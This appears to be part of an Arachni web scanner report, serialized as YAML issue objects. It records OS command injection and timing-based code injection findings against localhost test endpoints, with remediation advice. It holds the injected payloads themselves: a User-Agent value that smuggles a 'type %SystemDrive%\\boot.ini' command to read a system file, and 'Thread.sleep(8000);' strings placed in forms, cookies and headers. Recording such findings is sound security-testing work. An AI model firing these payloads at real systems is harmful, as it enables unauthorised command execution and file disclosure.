    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "9.0"
  cwe: "78"
  cwe_url: http://cwe.mitre.org/data/definitions/78.html
  description: |-
    The web application allows an attacker to
        execute arbitrary OS commands.
  elem: header
  internal_modname: OSCmdInjection
  metasploitable: unix/webapp/arachni_exec
  method: GET
  mod_name: OS command injection
  name: Operating system command injection
  references: 
    OWASP: http://www.owasp.org/index.php/OS_Command_Injection
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as OS level commands.
  severity: High
  tags: 
  - os
  - command
  - code
  - injection
  - regexp
  url: http://localhost:6412/windows/header/append
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "9.0"
    cwe: "78"
    cwe_url: http://cwe.mitre.org/data/definitions/78.html
    description: |-
      The web application allows an attacker to
          execute arbitrary OS commands.
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: arachni_user type %SystemDrive%\\boot.ini
        Cookie: cookie=cookie+value;cookie2=cookie+value
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "202"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    injected: arachni_user type %SystemDrive%\\boot.ini
    internal_modname: OSCmdInjection
    metasploitable: unix/webapp/arachni_exec
    method: GET
    mod_name: OS command injection
    name: Operating system command injection
    opts: 
      :redundant: false
      :async: true
      :regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
      :match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
      :substring: 
      :ignore: 
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      - 2
      :injected_orig: " type %SystemDrive%\\\\boot.ini"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: arachni_user type %SystemDrive%\\boot.ini
      :injected: arachni_user type %SystemDrive%\\boot.ini
      :combo: 
        User-Agent: arachni_user type %SystemDrive%\\boot.ini
      :action: http://localhost:6412/windows/header/append
      :verification: false
      :id: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    references: 
      OWASP: http://www.owasp.org/index.php/OS_Command_Injection
    regexp: (?-mix:\[boot loader\](.*)\[operating systems\])
    regexp_match: "[\"\\\\ntimeout=30\\\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\\\\\WINDOWS\\\\n\"]"
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as OS level commands.
    response: "[\"[boot loader]\\ntimeout=30\\ndefault=multi(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS\\n[operating systems]\\nmulti(0)disk(0)rdisk(0)partition(1)\\\\WINDOWS=\\\"Microsoft Windows XP Professional\\\" /fastdetect\\n\"]"
    severity: High
    tags: 
    - os
    - command
    - code
    - injection
    - regexp
    url: http://localhost:6412/windows/header/append
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/java/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  Thread.sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.sleep(8000);"
      :altered: input
      :element: form
      :params: 
        input: "  Thread.sleep(8000);"
      :follow_location: true
      :injected: "  Thread.sleep(8000);"
      :combo: 
        input: "  Thread.sleep(8000);"
      :action: http://localhost:7470/java/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/java/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/java/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  Thread.sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.sleep(8000);"
      :altered: input
      :element: link
      :params: 
        input: "  Thread.sleep(8000);"
      :follow_location: true
      :injected: "  Thread.sleep(8000);"
      :combo: 
        input: "  Thread.sleep(8000);"
      :action: http://localhost:7470/java/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/java/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/java/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++Thread.sleep(8000)%3B
      response: {}

    id: 
    injected: "  Thread.sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.sleep(8000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  Thread.sleep(8000);"
      :injected: "  Thread.sleep(8000);"
      :combo: 
        cookie: "  Thread.sleep(8000);"
      :action: http://localhost:7470/java/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/java/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/java/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  Thread.sleep(8000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  Thread.sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  Thread.sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: " &&  Thread.sleep(8000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  Thread.sleep(8000);"
      :injected: " &&  Thread.sleep(8000);"
      :combo: 
        User-Agent: " &&  Thread.sleep(8000);"
      :action: http://localhost:7470/java/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/java/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/asp/form/straight
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: form
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  Thread.Sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: POST
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.Sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.Sleep(8000);"
      :altered: input
      :element: form
      :params: 
        input: "  Thread.Sleep(8000);"
      :follow_location: true
      :injected: "  Thread.Sleep(8000);"
      :combo: 
        input: "  Thread.Sleep(8000);"
      :action: http://localhost:7470/asp/form/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/asp/form/straight
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: link
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/asp/link/straight?input=default
  var: input
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: link
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: "  Thread.Sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.Sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.Sleep(8000);"
      :altered: input
      :element: link
      :params: 
        input: "  Thread.Sleep(8000);"
      :follow_location: true
      :injected: "  Thread.Sleep(8000);"
      :combo: 
        input: "  Thread.Sleep(8000);"
      :action: http://localhost:7470/asp/link/straight?input=default
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/asp/link/straight?input=default
    var: input
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: cookie
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/asp/cookie/straight
  var: cookie
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: cookie
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
        Cookie: cookie=++Thread.Sleep(8000)%3B
      response: {}

    id: 
    injected: "  Thread.Sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: "  Thread.Sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: "  Thread.Sleep(8000);"
      :altered: cookie
      :element: cookie
      :params: {}

      :follow_location: true
      :cookies: 
        cookie: "  Thread.Sleep(8000);"
      :injected: "  Thread.Sleep(8000);"
      :combo: 
        cookie: "  Thread.Sleep(8000);"
      :action: http://localhost:7470/asp/cookie/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/asp/cookie/straight
    var: cookie
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: header
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: GET
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/asp/header/straight
  var: User-Agent
  variations: 
  - !ruby/object:Arachni::Issue 
    cvssv2: "7.5"
    cwe: "94"
    cwe_url: http://cwe.mitre.org/data/definitions/94.html
    description: |-
      Arbitrary code can be injected into the web application
          which is then executed as part of the system.
          (This issue was discovered using a timing attack; timing attacks
          can result in false positives in cases where the server takes
          an abnormally long time to respond.
          Either case, these issues will require further investigation
          even if they are false positives.)
    elem: header
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: " &&  Thread.Sleep(8000);"
        Cookie: cookie=cookie+value
      response: {}

    id: 
    injected: " &&  Thread.Sleep(8000);"
    internal_modname: CodeInjectionTiming
    metasploitable: unix/webapp/arachni_php_eval
    method: GET
    mod_name: Code injection (timing)
    name: Code injection (timing attack)
    opts: 
      :redundant: false
      :async: true
      :elements: 
      - link
      - form
      - cookie
      - header
      - body
      :train: 
      :format: 
      - 1
      :timeout: 5600.0
      :timeout_divider: 1
      :timing_string: " &&  Thread.Sleep(__TIME__);"
      :skip_orig: true
      :injected_orig: " &&  Thread.Sleep(8000);"
      :altered: User-Agent
      :element: header
      :params: 
      :follow_location: true
      :headers: 
        User-Agent: " &&  Thread.Sleep(8000);"
      :injected: " &&  Thread.Sleep(8000);"
      :combo: 
        User-Agent: " &&  Thread.Sleep(8000);"
      :action: http://localhost:7470/asp/header/straight
      :silent: true
      :regexp: ""
    references: 
      PHP: http://php.net/manual/en/function.eval.php
      Perl: http://perldoc.perl.org/functions/eval.html
      Python: http://docs.python.org/py3k/library/functions.html#eval
      ASP: http://www.aspdev.org/asp/asp-eval-execute/
      Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
    regexp: ""
    regexp_match: 
    remedy_code: ""
    remedy_guidance: |-
      User inputs must be validated and filtered
          before being evaluated as executable code.
          Better yet, the web application should stop evaluating user
          inputs as any part of dynamic code altogether.
    response: ""
    severity: High
    tags: 
    - code
    - injection
    - timing
    - blind
    url: http://localhost:7470/asp/header/straight
    var: User-Agent
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  cvssv2: "7.5"
  cwe: "94"
  cwe_url: http://cwe.mitre.org/data/definitions/94.html
  description: |-
    Arbitrary code can be injected into the web application
        which is then executed as part of the system.
        (This issue was discovered using a timing attack; timing attacks
        can result in false positives in cases where the server takes
        an abnormally long time to respond.
        Either case, these issues will require further investigation
        even if they are false positives.)
  elem: form
  internal_modname: CodeInjectionTiming
  metasploitable: unix/webapp/arachni_php_eval
  method: POST
  mod_name: Code injection (timing)
  name: Code injection (timing attack)
  references: 
    PHP: http://php.net/manual/en/function.eval.php
    Perl: http://perldoc.perl.org/functions/eval.html
    Python: http://docs.python.org/py3k/library/functions.html#eval
    ASP: http://www.aspdev.org/asp/asp-eval-execute/
    Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
  remedy_code: ""
  remedy_guidance: |-
    User inputs must be validated and filtered
        before being evaluated as executable code.
        Better yet, the web application should stop evaluating user
        inputs as any part of dynamic code altogether.
  severity: High
  tags: 
  - code
  - injection
  - timing
  - blind
  url: http://localhost:7470/python/form/straight
  var: input
